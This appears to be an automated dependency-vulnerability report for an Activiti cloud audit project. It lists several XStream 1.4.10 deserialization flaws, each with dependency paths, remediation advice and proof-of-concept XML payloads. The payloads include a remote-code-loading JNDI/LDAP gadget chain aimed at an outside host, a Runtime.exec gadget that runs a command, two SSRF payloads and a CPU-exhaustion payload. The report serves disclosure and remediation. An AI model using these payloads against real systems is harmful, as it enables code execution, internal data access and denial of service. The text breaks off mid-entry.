Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.
PoC
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: <none></m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
<soapPart/>
<mm>
<it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'>
<homeCtx>
<hostname>233.233.233.233</hostname>
<port__number>2333</port__number>
<clnt class='com.sun.jndi.ldap.LdapClient'/>
</homeCtx>
<hasMoreCalled>true</hasMoreCalled>
<more>true</more>
<posn>0</posn>
<limit>1</limit>
<entries>
<com.sun.jndi.ldap.LdapEntry>
<DN>uid=songtao.xu,ou=oa,dc=example,dc=com</DN>
<attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ignoreCase>false</ignoreCase>
</default>
<int>4</int>
<javax.naming.directory.BasicAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>objectClass</attrID>
</default>
<int>1</int>
<string>javanamingreference</string>
</javax.naming.directory.BasicAttribute>
</javax.naming.directory.BasicAttribute>
<javax.naming.directory.BasicAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>javaCodeBase</attrID>
</default>
<int>1</int>
<string>http://127.0.0.1:2333/</string>
</javax.naming.directory.BasicAttribute>
</javax.naming.directory.BasicAttribute>
<javax.naming.directory.BasicAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>javaClassName</attrID>
</default>
<int>1</int>
<string>refClassName</string>
</javax.naming.directory.BasicAttribute>
</javax.naming.directory.BasicAttribute>
<javax.naming.directory.BasicAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>javaFactory</attrID>
</default>
<int>1</int>
<string>Evil</string>
</javax.naming.directory.BasicAttribute>
</javax.naming.directory.BasicAttribute>
</javax.naming.directory.BasicAttribute>
</attributes>
</com.sun.jndi.ldap.LdapEntry>
</entries>
</aliases>
</it>
</mm>
</multiPart>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
XStream xstream = new XStream();
xstream.fromXML(xml);
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
References
high severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Deserialization of Untrusted Data. This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
PoC
<map>
<entry>
<jdk.nashorn.internal.runtime.Source_-URLData>
<url>http://localhost:8080/internal/</url>
<cs>GBK</cs>
<hash>1111</hash>
<array>b</array>
<length>0</length>
<lastModified>0</lastModified>
</jdk.nashorn.internal.runtime.Source_-URLData>
<jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
</entry>
<entry>
<jdk.nashorn.internal.runtime.Source_-URLData>
<url>http://localhost:8080/internal/</url>
<cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>
<hash>1111</hash>
<array>b</array>
<length>0</length>
<lastModified>0</lastModified>
</jdk.nashorn.internal.runtime.Source_-URLData>
<jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
</entry>
</map>
XStream xstream = new XStream();
xstream.fromXML(xml);
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
References
high severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Remote Code Execution (RCE). This vulnerability may allow a remote attacker that has sufficient rights to execute commands on the host only by manipulating the processed input stream. No user is affected who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 no longer uses a blacklist by default, since it cannot be secured for general purposes.
PoC
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class='sun.tracing.NullProvider'>
<active>true</active>
<providerType>java.lang.Comparable</providerType>
<probes>
<entry>
<method>
<class>java.lang.Comparable</class>
<name>compareTo</name>
<parameter-types>
<class>java.lang.Object</class>
</parameter-types>
</method>
<sun.tracing.dtrace.DTraceProbe>
<proxy class='java.lang.Runtime'/>
<implementing__method>
<class>java.lang.Runtime</class>
<name>exec</name>
<parameter-types>
<class>java.lang.String</class>
</parameter-types>
</implementing__method>
</sun.tracing.dtrace.DTraceProbe>
</entry>
</probes>
</handler>
</dynamic-proxy>
<string>calc</string>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
XStream xstream = new XStream();
xstream.fromXML(xml);
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
References
high severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
PoC
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>
<owner/>
<managedObjectManagerClosed>false</managedObjectManagerClosed>
<databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>
<stubHandlers>
<entry>
<method>
<class>java.lang.Comparable</class>
<name>compareTo</name>
<parameter-types>
<class>java.lang.Object</class>
</parameter-types>
</method>
<com.sun.xml.internal.ws.client.sei.StubHandler>
<bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>
<indices>
<int>0</int>
</indices>
<getters>
<com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>
</getters>
<accessors>
<com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
<val_-isJAXBElement>false</val_-isJAXBElement>
<val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>
<type>int</type>
<field>
<name>hash</name>
<clazz>java.lang.String</clazz>
</field>
</val_-getter>
<val_-isListType>false</val_-isListType>
<val_-n>
<namespaceURI/>
<localPart>hash</localPart>
<prefix/>
</val_-n>
<val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>
<type>java.lang.String</type>
<method>
<class>jdk.nashorn.internal.runtime.Source</class>
<name>readFully</name>
<parameter-types>
<class>java.net.URL</class>
</parameter-types>
</method>
</val_-setter>
<outer-class>
<propertySetters>
<entry>
<string>serialPersistentFields</string>
<com.sun.xml.internal.ws.spi.db.FieldSetter>
<type>[Ljava.io.ObjectStreamField;</type>
<field>
<name>serialPersistentFields</name>
<clazz>java.lang.String</clazz>
</field>
</com.sun.xml.internal.ws.spi.db.FieldSetter>
</entry>
<entry>
<string>CASE_INSENSITIVE_ORDER</string>
<com.sun.xml.internal.ws.spi.db.FieldSetter>
<type>java.util.Comparator</type>
<field>
<name>CASE_INSENSITIVE_ORDER</name>
<clazz>java.lang.String</clazz>
</field>
</com.sun.xml.internal.ws.spi.db.FieldSetter>
</entry>
<entry>
<string>serialVersionUID</string>
<com.sun.xml.internal.ws.spi.db.FieldSetter>
<type>long</type>
<field>
<name>serialVersionUID</name>
<clazz>java.lang.String</clazz>
</field>
</com.sun.xml.internal.ws.spi.db.FieldSetter>
</entry>
<entry>
<string>value</string>
<com.sun.xml.internal.ws.spi.db.FieldSetter>
<type>[C</type>
<field>
<name>value</name>
<clazz>java.lang.String</clazz>
</field>
</com.sun.xml.internal.ws.spi.db.FieldSetter>
</entry>
<entry>
<string>hash</string>
<com.sun.xml.internal.ws.spi.db.FieldSetter>
<type>int</type>
<field reference='../../../../../val_-getter/field'/>
</com.sun.xml.internal.ws.spi.db.FieldSetter>
</entry>
</propertySetters>
<propertyGetters>
<entry>
<string>serialPersistentFields</string>
<com.sun.xml.internal.ws.spi.db.FieldGetter>
<type>[Ljava.io.ObjectStreamField;</type>
<field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
</com.sun.xml.internal.ws.spi.db.FieldGetter>
</entry>
<entry>
<string>CASE_INSENSITIVE_ORDER</string>
<com.sun.xml.internal.ws.spi.db.FieldGetter>
<type>java.util.Comparator</type>
<field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
</com.sun.xml.internal.ws.spi.db.FieldGetter>
</entry>
<entry>
<string>serialVersionUID</string>
<com.sun.xml.internal.ws.spi.db.FieldGetter>
<type>long</type>
<field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
</com.sun.xml.internal.ws.spi.db.FieldGetter>
</entry>
<entry>
<string>value</string>
<com.sun.xml.internal.ws.spi.db.FieldGetter>
<type>[C</type>
<field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
</com.sun.xml.internal.ws.spi.db.FieldGetter>
</entry>
<entry>
<string>hash</string>
<com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>
</entry>
</propertyGetters>
<elementLocalNameCollision>false</elementLocalNameCollision>
<contentClass>java.lang.String</contentClass>
<elementDeclaredTypes/>
</outer-class>
</com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
</accessors>
<wrapper>java.lang.Object</wrapper>
<bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>
<dynamicWrapper>false</dynamicWrapper>
</bodyBuilder>
<isOneWay>false</isOneWay>
</com.sun.xml.internal.ws.client.sei.StubHandler>
</entry>
</stubHandlers>
<clientConfig>false</clientConfig>
</databinding>
<methodHandlers>
<entry>
<method reference='../../../databinding/stubHandlers/entry/method'/>
<com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
<owner reference='../../../..'/>
<method reference='../../../../databinding/stubHandlers/entry/method'/>
<isVoid>false</isVoid>
<isOneway>false</isOneway>
</com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
</entry>
</methodHandlers>
</handler>
</dynamic-proxy>
<url>http://localhost:8080/internal/</url>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
XStream xstream = new XStream();
xstream.fromXML(xml);
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
References
high severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Denial of Service (DoS). An attacker can manipulate the processed input stream and replace or inject objects, that result in exponential recursively hashcode calculation,
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.19 or higher.
References
high severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is vulnerability which may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream.
PoC
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
<comparator class='javafx.collections.ObservableList$1'/>
</default>
<int>3</int>
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
<dataHandler>
<dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
<is class='java.io.ByteArrayInputStream'>
<buf></buf>
<pos>-2147483648</pos>
<mark>0</mark>
<count>0</count>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.
Details
Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.
Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.
Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.
An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.
Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.
References
high severity
- Vulnerable module: org.bouncycastle:bcprov-jdk15on
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
